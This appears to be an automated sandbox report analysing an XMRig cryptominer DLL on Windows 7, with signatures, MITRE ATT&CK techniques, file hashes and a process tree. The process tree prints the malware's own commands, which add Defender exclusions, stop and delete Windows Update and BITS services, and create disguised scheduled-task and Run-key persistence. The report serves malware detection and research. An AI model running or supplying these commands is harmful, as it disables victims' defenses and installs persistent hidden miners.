xmrig | 1d58e9f81b10e3da48c2525020f25e6109f14026e1234041bf7131c5b8c0c8bd

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
25-10-2022 09:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a54d4986e42a30f271bf1e70e9153b44.dll
Size

2.7MB
MD5

a54d4986e42a30f271bf1e70e9153b44
SHA1

a7f8b572c7afd435690200115adf3b047486d3a6
SHA256

1d58e9f81b10e3da48c2525020f25e6109f14026e1234041bf7131c5b8c0c8bd
SHA512

f5895ca7f359b18d9cee671dfc904cc1417d01b2abf0e67195397dabb0d463ed64b9a64edb299f000a54aad3e0139879859363bc3086a62101d09a7b58f51532
SSDEEP

49152:Jzl1rpbUrqvv0v2rQVt8nqwI7lOOYch2ek:P1Kqvv07noI7lOOYcz

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/1148-136-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/1148-141-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	2000	rundll32.exe
3	2000	rundll32.exe
5	2000	rundll32.exe
8	2000	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	bdhvocwjhiouevfy.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 2 IoCs

pid	Process
1248	bdhvocwjhiouevfy.exe
524	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1148-136-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/1148-141-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Loads dropped DLL 2 IoCs

pid	Process
2000	rundll32.exe
1676	taskeng.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 524 set thread context of 1696	524	updater.exe	68
PID 524 set thread context of 1148	524	updater.exe	75

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1028	sc.exe
1888	sc.exe
1616	sc.exe
836	sc.exe
1448	sc.exe
580	sc.exe
1940	sc.exe
1448	sc.exe
1964	sc.exe
1188	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1536	schtasks.exe
1996	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2000	rundll32.exe
1528	powershell.exe
1224	powershell.exe
1364	powershell.exe
852	powershell.exe
1572	powershell.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe
1148	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1364	powershell.exe
Token: SeDebugPrivilege	852	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	524	updater.exe
Token: SeIncreaseQuotaPrivilege	796	WMIC.exe
Token: SeSecurityPrivilege	796	WMIC.exe
Token: SeTakeOwnershipPrivilege	796	WMIC.exe
Token: SeLoadDriverPrivilege	796	WMIC.exe
Token: SeSystemProfilePrivilege	796	WMIC.exe
Token: SeSystemtimePrivilege	796	WMIC.exe
Token: SeProfSingleProcessPrivilege	796	WMIC.exe
Token: SeIncBasePriorityPrivilege	796	WMIC.exe
Token: SeCreatePagefilePrivilege	796	WMIC.exe
Token: SeBackupPrivilege	796	WMIC.exe
Token: SeRestorePrivilege	796	WMIC.exe
Token: SeShutdownPrivilege	796	WMIC.exe
Token: SeDebugPrivilege	796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	796	WMIC.exe
Token: SeRemoteShutdownPrivilege	796	WMIC.exe
Token: SeUndockPrivilege	796	WMIC.exe
Token: SeManageVolumePrivilege	796	WMIC.exe
Token: 33	796	WMIC.exe
Token: 34	796	WMIC.exe
Token: 35	796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	796	WMIC.exe
Token: SeSecurityPrivilege	796	WMIC.exe
Token: SeTakeOwnershipPrivilege	796	WMIC.exe
Token: SeLoadDriverPrivilege	796	WMIC.exe
Token: SeSystemProfilePrivilege	796	WMIC.exe
Token: SeSystemtimePrivilege	796	WMIC.exe
Token: SeProfSingleProcessPrivilege	796	WMIC.exe
Token: SeIncBasePriorityPrivilege	796	WMIC.exe
Token: SeCreatePagefilePrivilege	796	WMIC.exe
Token: SeBackupPrivilege	796	WMIC.exe
Token: SeRestorePrivilege	796	WMIC.exe
Token: SeShutdownPrivilege	796	WMIC.exe
Token: SeDebugPrivilege	796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	796	WMIC.exe
Token: SeRemoteShutdownPrivilege	796	WMIC.exe
Token: SeUndockPrivilege	796	WMIC.exe
Token: SeManageVolumePrivilege	796	WMIC.exe
Token: 33	796	WMIC.exe
Token: 34	796	WMIC.exe
Token: 35	796	WMIC.exe
Token: SeDebugPrivilege	524	updater.exe
Token: SeLockMemoryPrivilege	1148	dwm.exe
Token: SeLockMemoryPrivilege	1148	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 1972 wrote to memory of 2000	1972	rundll32.exe	27
PID 2000 wrote to memory of 1248	2000	rundll32.exe	28
PID 2000 wrote to memory of 1248	2000	rundll32.exe	28
PID 2000 wrote to memory of 1248	2000	rundll32.exe	28
PID 2000 wrote to memory of 1248	2000	rundll32.exe	28
PID 1248 wrote to memory of 1528	1248	bdhvocwjhiouevfy.exe	29
PID 1248 wrote to memory of 1528	1248	bdhvocwjhiouevfy.exe	29
PID 1248 wrote to memory of 1528	1248	bdhvocwjhiouevfy.exe	29
PID 1248 wrote to memory of 840	1248	bdhvocwjhiouevfy.exe	31
PID 1248 wrote to memory of 840	1248	bdhvocwjhiouevfy.exe	31
PID 1248 wrote to memory of 840	1248	bdhvocwjhiouevfy.exe	31
PID 1248 wrote to memory of 1224	1248	bdhvocwjhiouevfy.exe	33
PID 1248 wrote to memory of 1224	1248	bdhvocwjhiouevfy.exe	33
PID 1248 wrote to memory of 1224	1248	bdhvocwjhiouevfy.exe	33
PID 840 wrote to memory of 580	840	cmd.exe	35
PID 840 wrote to memory of 580	840	cmd.exe	35
PID 840 wrote to memory of 580	840	cmd.exe	35
PID 840 wrote to memory of 1940	840	cmd.exe	36
PID 840 wrote to memory of 1940	840	cmd.exe	36
PID 840 wrote to memory of 1940	840	cmd.exe	36
PID 840 wrote to memory of 1448	840	cmd.exe	37
PID 840 wrote to memory of 1448	840	cmd.exe	37
PID 840 wrote to memory of 1448	840	cmd.exe	37
PID 840 wrote to memory of 1028	840	cmd.exe	38
PID 840 wrote to memory of 1028	840	cmd.exe	38
PID 840 wrote to memory of 1028	840	cmd.exe	38
PID 840 wrote to memory of 1888	840	cmd.exe	39
PID 840 wrote to memory of 1888	840	cmd.exe	39
PID 840 wrote to memory of 1888	840	cmd.exe	39
PID 840 wrote to memory of 1688	840	cmd.exe	40
PID 840 wrote to memory of 1688	840	cmd.exe	40
PID 840 wrote to memory of 1688	840	cmd.exe	40
PID 840 wrote to memory of 764	840	cmd.exe	41
PID 840 wrote to memory of 764	840	cmd.exe	41
PID 840 wrote to memory of 764	840	cmd.exe	41
PID 840 wrote to memory of 1824	840	cmd.exe	42
PID 840 wrote to memory of 1824	840	cmd.exe	42
PID 840 wrote to memory of 1824	840	cmd.exe	42
PID 840 wrote to memory of 1140	840	cmd.exe	43
PID 840 wrote to memory of 1140	840	cmd.exe	43
PID 840 wrote to memory of 1140	840	cmd.exe	43
PID 840 wrote to memory of 1820	840	cmd.exe	44
PID 840 wrote to memory of 1820	840	cmd.exe	44
PID 840 wrote to memory of 1820	840	cmd.exe	44
PID 1224 wrote to memory of 1536	1224	powershell.exe	45
PID 1224 wrote to memory of 1536	1224	powershell.exe	45
PID 1224 wrote to memory of 1536	1224	powershell.exe	45
PID 1248 wrote to memory of 1364	1248	bdhvocwjhiouevfy.exe	46
PID 1248 wrote to memory of 1364	1248	bdhvocwjhiouevfy.exe	46
PID 1248 wrote to memory of 1364	1248	bdhvocwjhiouevfy.exe	46
PID 1364 wrote to memory of 1708	1364	powershell.exe	48
PID 1364 wrote to memory of 1708	1364	powershell.exe	48
PID 1364 wrote to memory of 1708	1364	powershell.exe	48
PID 1676 wrote to memory of 524	1676	taskeng.exe	50
PID 1676 wrote to memory of 524	1676	taskeng.exe	50
PID 1676 wrote to memory of 524	1676	taskeng.exe	50
PID 524 wrote to memory of 852	524	updater.exe	51
PID 524 wrote to memory of 852	524	updater.exe	51

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\a54d4986e42a30f271bf1e70e9153b44.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\a54d4986e42a30f271bf1e70e9153b44.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2000
- - C:\Users\Admin\AppData\Local\Temp\bdhvocwjhiouevfy.exe
    "C:\Users\Admin\AppData\Local\Temp\bdhvocwjhiouevfy.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1528
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:840
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:580
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1940
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1448
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1028
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:1888
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:1688
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:764
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:1824
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:1140
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1224
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
        5⤵
        Creates scheduled task(s)
        
        PID:1536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#btrwhe#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1364
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:1708

C:\Windows\system32\taskeng.exe
taskeng.exe {00F9122D-C8FB-49BE-8338-A21B51DCCD95} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1676
- C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell <#gesvv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
      4⤵
      Creates scheduled task(s)
      PID:1996
- - C:\Windows\system32\cmd.exe
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1928
  - - C:\Windows\system32\sc.exe
      sc stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1616
  - - C:\Windows\system32\sc.exe
      sc stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1964
  - - C:\Windows\system32\sc.exe
      sc stop bits
      4⤵
      Launches sc.exe
      PID:836
  - - C:\Windows\system32\sc.exe
      sc stop dosvc
      4⤵
      Launches sc.exe
      PID:1188
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      Launches sc.exe
      PID:1448
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      4⤵
      PID:1960
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      4⤵
      PID:1100
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      4⤵
      PID:280
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      PID:268
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      4⤵
      PID:1948
- - C:\Windows\system32\conhost.exe
    C:\Windows\system32\conhost.exe cuujhamlfzwomvc
    3⤵
    PID:1696
  - - C:\Windows\system32\cmd.exe
      cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
      4⤵
      PID:1492
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:796
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
    3⤵
    PID:840
- - C:\Windows\system32\dwm.exe
    C:\Windows\system32\dwm.exe hhpaajoofiimzvle 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2cGMVpnPgCpRS4DeAKMErD9sVFST+vIdKC5haHZrq6Ao
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1148

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bdhvocwjhiouevfy.exe

Filesize
4.0MB

MD5
254f52d736b363ba19a748d44d36bfbe

SHA1
ed37a872ed90f79691e63c3e770f0e30df0a667a

SHA256
1407005795e62e9cf1c25ac71cb547b2f59dcbb427823e1bc58c75fc05ff328a

SHA512
e4fa7e7ecfa499e4478dd4aa57ea661b26c255c1993445c85393f502c2eb02a5ebfd8af1918ff9a2bdc0a751c80a206274092da03843da06744f6c91ebd82413

Download Submit
C:\Users\Admin\AppData\Local\Temp\bdhvocwjhiouevfy.exe

Filesize
4.0MB

MD5
254f52d736b363ba19a748d44d36bfbe

SHA1
ed37a872ed90f79691e63c3e770f0e30df0a667a

SHA256
1407005795e62e9cf1c25ac71cb547b2f59dcbb427823e1bc58c75fc05ff328a

SHA512
e4fa7e7ecfa499e4478dd4aa57ea661b26c255c1993445c85393f502c2eb02a5ebfd8af1918ff9a2bdc0a751c80a206274092da03843da06744f6c91ebd82413

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
67047d56feeb8d7b999e878aa443f42c

SHA1
1a0f57fea28a17171ccc63da2ef211f001b4cb67

SHA256
097ea3bed40d4251c6b1d68d0eb5703512698456f4e8dfbcb3930a3e37b7eaa4

SHA512
db29f658c168584a664882024a9222b087300d83f6346e0787afe87f332f6771a7e0f5201f788cef2f2c527fdf208b3b7f2fccaf2d783fdce94142be3ea1849d

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
67047d56feeb8d7b999e878aa443f42c

SHA1
1a0f57fea28a17171ccc63da2ef211f001b4cb67

SHA256
097ea3bed40d4251c6b1d68d0eb5703512698456f4e8dfbcb3930a3e37b7eaa4

SHA512
db29f658c168584a664882024a9222b087300d83f6346e0787afe87f332f6771a7e0f5201f788cef2f2c527fdf208b3b7f2fccaf2d783fdce94142be3ea1849d

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
94d19ba7b4cf7fd7b9e5150318edc482

SHA1
240486bc7d39118af7df9583ec0f3906b80d285f

SHA256
92849ea419dabc8637c0390d7ebbc7ce0a764c73bce077bb74572be63bb5d55a

SHA512
30a2b1e0d762d1c837e72b7b5f14b86a4fa182b2b6512e879c3870923bdebaf657eb24af863cff07d727d329388db3237ba65fc11b05a7204e6adfe7e103950f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
94d19ba7b4cf7fd7b9e5150318edc482

SHA1
240486bc7d39118af7df9583ec0f3906b80d285f

SHA256
92849ea419dabc8637c0390d7ebbc7ce0a764c73bce077bb74572be63bb5d55a

SHA512
30a2b1e0d762d1c837e72b7b5f14b86a4fa182b2b6512e879c3870923bdebaf657eb24af863cff07d727d329388db3237ba65fc11b05a7204e6adfe7e103950f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
94d19ba7b4cf7fd7b9e5150318edc482

SHA1
240486bc7d39118af7df9583ec0f3906b80d285f

SHA256
92849ea419dabc8637c0390d7ebbc7ce0a764c73bce077bb74572be63bb5d55a

SHA512
30a2b1e0d762d1c837e72b7b5f14b86a4fa182b2b6512e879c3870923bdebaf657eb24af863cff07d727d329388db3237ba65fc11b05a7204e6adfe7e103950f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
94d19ba7b4cf7fd7b9e5150318edc482

SHA1
240486bc7d39118af7df9583ec0f3906b80d285f

SHA256
92849ea419dabc8637c0390d7ebbc7ce0a764c73bce077bb74572be63bb5d55a

SHA512
30a2b1e0d762d1c837e72b7b5f14b86a4fa182b2b6512e879c3870923bdebaf657eb24af863cff07d727d329388db3237ba65fc11b05a7204e6adfe7e103950f

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
e416d7f259ddb1e69363f25db9690c98

SHA1
1e49e1945d1f0c4d0a626c3b113fc908c6404f75

SHA256
9660f4b26427de7df2b93249f1b6197d72d19764281a37c7b062c305887fe8d4

SHA512
5b69d6bef1e2798a0d036d1b40959e146fbb3a915b044bbceffb837b7a1fa4f1fb3e53b7621f7ba518d32bd64c1b58088edfc2a469297d5c71df8c0eec89bb72

Download Submit
\Users\Admin\AppData\Local\Temp\bdhvocwjhiouevfy.exe

Filesize
4.0MB

MD5
254f52d736b363ba19a748d44d36bfbe

SHA1
ed37a872ed90f79691e63c3e770f0e30df0a667a

SHA256
1407005795e62e9cf1c25ac71cb547b2f59dcbb427823e1bc58c75fc05ff328a

SHA512
e4fa7e7ecfa499e4478dd4aa57ea661b26c255c1993445c85393f502c2eb02a5ebfd8af1918ff9a2bdc0a751c80a206274092da03843da06744f6c91ebd82413

Download Submit
\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
67047d56feeb8d7b999e878aa443f42c

SHA1
1a0f57fea28a17171ccc63da2ef211f001b4cb67

SHA256
097ea3bed40d4251c6b1d68d0eb5703512698456f4e8dfbcb3930a3e37b7eaa4

SHA512
db29f658c168584a664882024a9222b087300d83f6346e0787afe87f332f6771a7e0f5201f788cef2f2c527fdf208b3b7f2fccaf2d783fdce94142be3ea1849d

Download Submit
memory/852-104-0x000007FEF40A0000-0x000007FEF4AC3000-memory.dmp

Filesize
10.1MB

Download
memory/852-107-0x00000000026D4000-0x00000000026D7000-memory.dmp

